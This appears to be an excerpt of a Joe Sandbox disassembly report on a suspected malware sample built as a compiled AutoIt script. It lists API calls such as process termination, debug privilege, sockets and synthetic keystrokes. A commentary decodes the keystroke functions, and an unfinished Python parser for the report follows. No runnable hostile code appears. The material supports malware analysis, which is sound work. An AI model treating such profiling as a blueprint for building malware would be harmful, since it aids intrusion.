                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 793581249-0
                                                                              • Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                              • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                                                                              • Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                              • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                                                                              APIs
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 634782764-0
                                                                              • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                              • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                                                                              • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                              • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                                                                              APIs
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                                                                              • DestroyIcon.USER32(00000000), ref: 0043C37F
                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                                                                              • DestroyIcon.USER32(?), ref: 0043C3AB
                                                                                • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                              • String ID:
                                                                              • API String ID: 2819616528-0
                                                                              • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                              • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                                                                              • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                              • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                                                                              APIs
                                                                                • Part of subcall function 0045A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A84C
                                                                                • Part of subcall function 0045A82C: GetCurrentThreadId.KERNEL32 ref: 0045A853
                                                                                • Part of subcall function 0045A82C: AttachThreadInput.USER32(00000000,?,00459683,?,00000001), ref: 0045A85A
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0045968E
                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004596AB
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004596AE
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596B7
                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004596D5
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596D8
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596E1
                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004596F8
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596FB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                              • String ID:
                                                                              • API String ID: 2014098862-0
                                                                              • Opcode ID: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                                                              • Instruction ID: 1862abde6b5ba1d27f2b77b23e96e8fddf5d6721de8ccd0207d4cd72f070cce3
                                                                              • Opcode Fuzzy Hash: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                                                              • Instruction Fuzzy Hash: F011E571910618BEF6106F61DC49F6E3B1DDB4C755F100939F644AB0A1CAF25C15DBA8
                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                                                                              • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                                                                              • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                                                                              • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                                                                              • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                                                                              • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                                                                              Similarity
                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                              • String ID:
                                                                              • API String ID: 1957940570-0
                                                                              • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                              • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                                                                              • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                              • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                                                                              APIs
                                                                                • Part of subcall function 0045710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                                                • Part of subcall function 0045710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                                                • Part of subcall function 0045710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                                                • Part of subcall function 0045710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479806
                                                                              • _memset.LIBCMT ref: 00479813
                                                                              • _memset.LIBCMT ref: 00479956
                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479982
                                                                              • CoTaskMemFree.OLE32(?), ref: 0047998D
                                                                              Strings
                                                                              • NULL Pointer assignment, xrefs: 004799DB
                                                                              Similarity
                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                              • String ID: NULL Pointer assignment
                                                                              • API String ID: 1300414916-2785691316
                                                                              • Opcode ID: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
                                                                              • Instruction ID: 344d97a8cecc5579365d94fc52d7d4a9bdae2fe77cb17e56d270d326fab8ac0d
                                                                              • Opcode Fuzzy Hash: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
                                                                              • Instruction Fuzzy Hash: BD915CB1D00218EBDB10DFA5DC81EDEBBB9EF08314F10806AF519A7291EB755A44CFA5
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                                                                              • _wcscat.LIBCMT ref: 00486EAD
                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                                                                              Similarity
                                                                              • API ID: MessageSend$Window_wcscat
                                                                              • String ID: SysListView32
                                                                              • API String ID: 307300125-78025650
                                                                              • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                              • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                                                                              • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                              • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                                                                              APIs
                                                                                • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                                                                                • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                                                                                • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                                                                              • GetLastError.KERNEL32 ref: 0047E9B7
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                                                                              • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                                                                              Similarity
                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                              • String ID: SeDebugPrivilege
                                                                              • API String ID: 2533919879-2896544425
                                                                              • Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                              • Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
                                                                              • Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                              • Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
                                                                              APIs
                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                                                                              Similarity
                                                                              • API ID: IconLoad
                                                                              • String ID: blank$info$question$stop$warning
                                                                              • API String ID: 2457776203-404129466
                                                                              • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                              • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                                                                              • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                              • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                                                                              • LoadStringW.USER32(00000000), ref: 00464319
                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                                                                              • LoadStringW.USER32(00000000), ref: 00464336
                                                                              • _wprintf.LIBCMT ref: 0046435C
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                                                                              Strings
                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                              • API String ID: 3648134473-3128320259
                                                                              • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                              • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                                                                              • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                              • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                                                                              APIs
                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                                                              • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                                                                              Similarity
                                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                              • String ID:
                                                                              • API String ID: 1211466189-0
                                                                              APIs
                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                                                                              Similarity
                                                                              • API ID: ShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1268545403-0
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                                                                                • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00467130
                                                                              • _memmove.LIBCMT ref: 0046717E
                                                                              • _memmove.LIBCMT ref: 0046719B
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                                                                              Similarity
                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 256516436-0
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 004861EB
                                                                              • GetDC.USER32(00000000), ref: 004861F3
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                                                                              Similarity
                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 3864802216-0
                                                                              APIs
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                              • _wcstok.LIBCMT ref: 0046EC94
                                                                              • _wcscpy.LIBCMT ref: 0046ED23
                                                                              • _memset.LIBCMT ref: 0046ED56
                                                                              Similarity
                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                              • String ID: X
                                                                              • API String ID: 774024439-3081909835
                                                                              APIs
                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
                                                                              • inet_ntoa.WSOCK32(?), ref: 00476CA7
                                                                                • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                                                                                • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                                                                              • _strlen.LIBCMT ref: 00476D44
                                                                              • _memmove.LIBCMT ref: 00476DAD
                                                                              Similarity
                                                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                              • String ID:
                                                                              • API String ID: 3619996494-0
                                                                              APIs
                                                                              • IsWindow.USER32(00A5C970), ref: 0048B3EB
                                                                              • IsWindowEnabled.USER32(00A5C970), ref: 0048B3F7
                                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                                                                              • SendMessageW.USER32(00A5C970,000000B0,?,?), ref: 0048B512
                                                                              • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                                                                              • GetWindowLongW.USER32(00A5C970,000000EC), ref: 0048B571
                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                              • String ID:
                                                                              • API String ID: 4072528602-0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0047F448
                                                                              • _memset.LIBCMT ref: 0047F511
                                                                              • ShellExecuteExW.SHELL32(?), ref: 0047F556
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                              • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                                                                              Similarity
                                                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                              • String ID: @
                                                                              • API String ID: 3522835683-2766056989
APIs
• GetParent.USER32(?), ref: 00460F8C
• GetKeyboardState.USER32(?), ref: 00460FA1
• SetKeyboardState.USER32(?), ref: 00461002
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
• Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
• Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
• Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
APIs
• GetParent.USER32(00000000), ref: 00460DA5
• GetKeyboardState.USER32(?), ref: 00460DBA
• SetKeyboardState.USER32(?), ref: 00460E1B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
• Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
• Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
• Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
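The two functions at 0x00460DA5 and 0x00460F8C read the keyboard state, write it back, and then post a key message to a parent window for each of four virtual keys; the report prints only the raw constants. Decoded, 0x100/0x101 are WM_KEYDOWN/WM_KEYUP and 0x10, 0x11, 0x12, 0x5B are VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN, so one function presses all four modifiers and the other releases them, which is consistent with the modifier handling of the AutoIt runtime that the "compiled AutoIt script" signature identifies rather than with anything the embedded payload does. The following Python is added here as an example and is not part of the Joe Sandbox report or of the sample: it parses API-call lines in the report's own format and names the message and virtual-key constants. The sample lines are copied from the two blocks above; the function names and the helper layout are mine.

```python
import re

# Constructed sample input: the API-call lines of the two functions above
# (0x00460DA5 and 0x00460F8C), copied verbatim from the report. The last
# line is the first WM_KEYUP post of the second function.
SAMPLE_CALLS = """\
GetParent.USER32(00000000), ref: 00460DA5
GetKeyboardState.USER32(?), ref: 00460DBA
SetKeyboardState.USER32(?), ref: 00460E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
"""

# Win32 constants from winuser.h: the ones these calls use plus neighbours.
WINDOW_MESSAGES = {
    0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0102: "WM_CHAR",
    0x0104: "WM_SYSKEYDOWN", 0x0105: "WM_SYSKEYUP",
}
KEY_MESSAGES = (0x0100, 0x0101, 0x0104, 0x0105)
VIRTUAL_KEYS = {
    0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
    0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
}

# One call line in the report's format, with or without an argument list and
# with or without the "Part of subcall function XXXXXXXX:" prefix.
CALL_RE = re.compile(
    r"(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]{8}:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


def _parse_arg(token):
    """Hex literal -> int; '?' (not recoverable from the dump) -> None; other text kept."""
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:
        return token  # e.g. the string literal DllGetClassObject


def parse_call(line):
    """Parse one API-call line; returns None for lines that are not calls."""
    m = CALL_RE.fullmatch(line.strip())
    if not m:
        return None
    args = [_parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
    return {"api": m["api"], "module": m["module"], "args": args, "ref": int(m["ref"], 16)}


def decode_post_message(call):
    """For Post/SendMessage calls, name the message and, for key messages, the VK code."""
    if call["api"] not in ("PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA"):
        return None
    if len(call["args"]) < 3:
        return None
    msg, wparam = call["args"][1], call["args"][2]
    msg_name = WINDOW_MESSAGES.get(msg, f"0x{msg:04X}" if isinstance(msg, int) else "?")
    if msg in KEY_MESSAGES:
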